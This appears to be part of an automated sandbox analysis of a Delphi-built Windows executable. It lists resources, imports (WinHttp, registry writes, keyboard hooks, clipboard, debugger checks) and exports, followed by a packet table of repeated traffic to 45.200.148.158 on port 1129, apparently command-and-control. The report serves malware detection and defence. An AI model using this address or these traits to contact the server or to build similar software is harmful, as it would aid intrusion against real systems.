.rsrc	0x7fd000	0x4f400	0x4f400	dc095950f4ebe5e2e0f82e3ad44bb382	False	0.6100897082018928	data	6.810693992432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x7fdfa8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x7fe0dc	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x7fe210	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x7fe344	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x7fe478	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x7fe5ac	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x7fe6e0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x7fe814	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 0			0.20460607304062373
RT_ICON	0x80343c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.4031791907514451
RT_ICON	0x8039a4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.6814079422382672
RT_ICON	0x80424c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.517590618336887
RT_ICON	0x8050f4	0x5c70	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9795892494929006
RT_STRING	0x80ad64	0x208	data			0.4576923076923077
RT_STRING	0x80af6c	0x594	data			0.35784313725490197
RT_STRING	0x80b500	0x420	data			0.36363636363636365
RT_STRING	0x80b920	0x150	data			0.5446428571428571
RT_STRING	0x80ba70	0x140	data			0.453125
RT_STRING	0x80bbb0	0xe0	data			0.45089285714285715
RT_STRING	0x80bc90	0x104	data			0.47307692307692306
RT_STRING	0x80bd94	0x48c	data			0.3634020618556701
RT_STRING	0x80c220	0x4b0	data			0.3358333333333333
RT_STRING	0x80c6d0	0x588	data			0.3516949152542373
RT_STRING	0x80cc58	0x344	data			0.4270334928229665
RT_STRING	0x80cf9c	0x4cc	data			0.39087947882736157
RT_STRING	0x80d468	0x78c	data			0.3302277432712215
RT_STRING	0x80dbf4	0x708	data			0.36777777777777776
RT_STRING	0x80e2fc	0x6d4	data			0.37414187643020597
RT_STRING	0x80e9d0	0x5c8	data			0.3344594594594595
RT_STRING	0x80ef98	0x5fc	data			0.3381201044386423
RT_STRING	0x80f594	0x8b8	PGP encrypted data			0.2831541218637993
RT_STRING	0x80fe4c	0x4cc	data			0.3469055374592834
RT_STRING	0x810318	0xc74	data			0.2882685069008783
RT_STRING	0x810f8c	0x650	data			0.38366336633663367
RT_STRING	0x8115dc	0x684	data			0.3327338129496403
RT_STRING	0x811c60	0x724	data			0.3079868708971554
RT_STRING	0x812384	0x6e4	data			0.32029478458049887
RT_STRING	0x812a68	0x50c	data			0.3397832817337461
RT_STRING	0x812f74	0x52c	data			0.3368580060422961
RT_STRING	0x8134a0	0x588	data			0.3411016949152542
RT_STRING	0x813a28	0x3a4	data			0.43240343347639487
RT_STRING	0x813dcc	0x3fc	data			0.3686274509803922
RT_STRING	0x8141c8	0x4b8	data			0.29718543046357615
RT_STRING	0x814680	0x4e4	data			0.33865814696485624
RT_STRING	0x814b64	0x398	data			0.28804347826086957
RT_STRING	0x814efc	0x3a0	data			0.4267241379310345
RT_STRING	0x81529c	0x1d8	data			0.5148305084745762
RT_STRING	0x815474	0xcc	data			0.6666666666666666
RT_STRING	0x815540	0x1b8	data			0.5318181818181819
RT_STRING	0x8156f8	0x3e8	data			0.38
RT_STRING	0x815ae0	0x3f0	data			0.3888888888888889
RT_STRING	0x815ed0	0x45c	data			0.3333333333333333
RT_STRING	0x81632c	0x2d8	data			0.33379120879120877
RT_STRING	0x816604	0x428	data			0.40977443609022557
RT_STRING	0x816a2c	0x498	data			0.38945578231292516
RT_STRING	0x816ec4	0x51c	data			0.3516819571865443
RT_STRING	0x8173e0	0x394	data			0.38318777292576417
RT_STRING	0x817774	0x390	data			0.34100877192982454
RT_STRING	0x817b04	0x41c	data			0.37072243346007605
RT_STRING	0x817f20	0xd0	data			0.5288461538461539
RT_STRING	0x817ff0	0xb8	data			0.6467391304347826
RT_STRING	0x8180a8	0x298	data			0.4819277108433735
RT_STRING	0x818340	0x438	data			0.3212962962962963
RT_STRING	0x818778	0x344	data			0.39593301435406697
RT_STRING	0x818abc	0x2dc	data			0.38114754098360654
RT_STRING	0x818d98	0x34c	data			0.3246445497630332
RT_RCDATA	0x8190e4	0x10	data			1.5
RT_RCDATA	0x8190f4	0xd70	data			0.44825581395348835
RT_RCDATA	0x819e64	0x151	Delphi compiled form 'TForm1'			0.7210682492581603
RT_RCDATA	0x819fb8	0x32053	data	English	United States	0.7254628251245833
RT_GROUP_CURSOR	0x84c00c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x84c020	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x84c034	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x84c048	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x84c05c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x84c070	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x84c084	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x84c098	0x4c	data			0.8289473684210527
RT_VERSION	0x84c0e4	0x314	data	Chinese	China	0.45558375634517767

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMetaRgn, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MultiByteToWideChar, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringA, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysStringLen, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoCreateInstance, CoGetMalloc, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
shell32.dll	Shell_NotifyIconW
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
winhttp.dll	WinHttpWriteData, WinHttpSetOption, WinHttpSetCredentials, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpReadData, WinHttpQueryOption, WinHttpQueryHeaders, WinHttpQueryDataAvailable, WinHttpQueryAuthSchemes, WinHttpOpenRequest, WinHttpOpen, WinHttpCrackUrl, WinHttpConnect, WinHttpCloseHandle, WinHttpAddRequestHeaders

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x49ec60
__dbk_fcall_wrapper	2	0x416c50
dbkFCallWrapperAddr	1	0xb36f58

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Chinese	China

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 18:09:55.461775064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:55.466660023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:55.466728926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:55.467158079 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:55.471923113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:56.073965073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:56.120426893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:57.944812059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:57.949661016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:57.949712038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:57.954441071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.274868965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.323635101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.403930902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.405615091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.410389900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.410459042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.415262938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.701138973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.745397091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.830204010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.830373049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.835133076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.835181952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.839935064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.842053890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.846791983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.846831083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.851553917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.964481115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.969284058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:58.969355106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:58.974158049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.247256994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.247776985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.247859955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.248775005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.248786926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.248850107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.250211000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.250221968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.250264883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.252496958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.252509117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.252578020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.254884958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.254898071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.254915953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.254935980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.307909966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.328381062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.328893900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.328942060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.333816051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.334729910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.334781885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.334964037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.336031914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.336081982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.339473009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.339484930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.339499950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.339519978 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.340795994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.340807915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.340848923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.344242096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.344254017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.344273090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.344280958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.344316959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.345508099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.345520020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.345560074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.348994017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.349006891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.349026918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.349080086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.350454092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.350466013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.350498915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.353682995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.353694916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.353730917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.355220079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.355237961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.355247021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.355288982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.420501947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.421040058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.421051979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.421084881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.422451019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.422497988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.425730944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.425745964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.425796986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.427251101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.427267075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.427277088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.427320004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.430428982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.430445910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.430459023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.430473089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.430499077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.431981087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.432001114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.432050943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.435132980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.435151100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.435163975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.435201883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.436681032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.436697006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.436733961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.439809084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.439821005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.439855099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.441457987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.441473961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.441509008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.444498062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.444514036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.444550037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.446157932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.446173906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.446190119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.446211100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.446227074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.449192047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.449203968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.449246883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.450870037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.450885057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.450942993 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.453907967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.453919888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.453975916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.455569983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.455590963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.455604076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.455625057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.457339048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.457350969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.457380056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.459618092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.459630013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:09:59.459675074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:09:59.461906910 CET	1129	49730	45.200.148.158	192.168.2.4
